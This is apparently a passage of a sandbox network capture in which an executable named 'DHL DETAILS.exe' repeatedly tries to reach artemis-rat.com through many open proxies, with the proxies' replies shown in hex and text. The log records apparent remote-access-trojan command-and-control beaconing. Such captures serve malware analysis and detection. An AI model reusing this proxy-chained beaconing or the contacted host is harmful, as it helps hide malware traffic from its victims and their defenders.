Mar 9, 2024 13:14:18.248466969 CET	1254	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.28 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html;charset=utf-8 Content-Length: 952 X-Squid-Error: ERR_ACCESS_DENIED 0 Content-Language: en X-Cache: MISS from ah_test Via: 1.1 ah_test (squid/3.5.28) Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 31 37 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/">https://artemis-rat.com/</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:17 GMT</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1252	192.168.2.5	53660	218.252.244.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.000579119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1253	192.168.2.5	53662	20.111.54.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.084031105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.382025003 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1254	192.168.2.5	53692	140.238.25.255	21000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.084031105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1255	192.168.2.5	51963	16.162.211.90	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.086553097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177052021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1256	192.168.2.5	53661	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.087400913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1257	192.168.2.5	53697	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.087523937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1258	192.168.2.5	53672	122.51.123.219	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.088562965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1259	192.168.2.5	53663	27.65.240.157	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.089492083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1260	192.168.2.5	53706	94.45.74.60	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.089713097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1261	192.168.2.5	53673	91.202.230.219	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.089875937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1262	192.168.2.5	53714	94.177.106.178	2324	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.091238022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1263	192.168.2.5	51970	93.90.212.2	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.092529058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1264	192.168.2.5	53669	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.093507051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1265	192.168.2.5	53333	138.36.199.14	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.096921921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1266	192.168.2.5	53749	8.213.137.155	40	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.096924067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.833302975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.884516954 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1267	192.168.2.5	52506	125.227.225.157	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.097130060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1268	192.168.2.5	51867	103.76.253.66	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.097130060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177088022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1269	192.168.2.5	51982	199.229.254.129	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.098941088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1270	192.168.2.5	53063	117.160.250.130	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.102027893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.945498943 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1271	192.168.2.5	53731	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.102101088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1272	192.168.2.5	53747	8.130.34.237	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.102145910 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:18.435964108 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1273	192.168.2.5	53485	117.160.250.163	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.102432013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.935461044 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:18 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1274	192.168.2.5	53709	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.104597092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1275	192.168.2.5	53754	8.213.137.155	135	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.111196995 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:18.870842934 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1276	192.168.2.5	53760	206.220.175.2	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.138062954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1277	192.168.2.5	53756	43.128.146.42	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.138268948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1278	192.168.2.5	52165	50.63.12.33	52814	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.143188000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177133083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.176959038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1279	192.168.2.5	53755	8.213.137.155	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.143349886 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:18.870929956 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1280	192.168.2.5	52882	98.181.137.83	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.245903969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1281	192.168.2.5	53784	104.21.194.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.246144056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
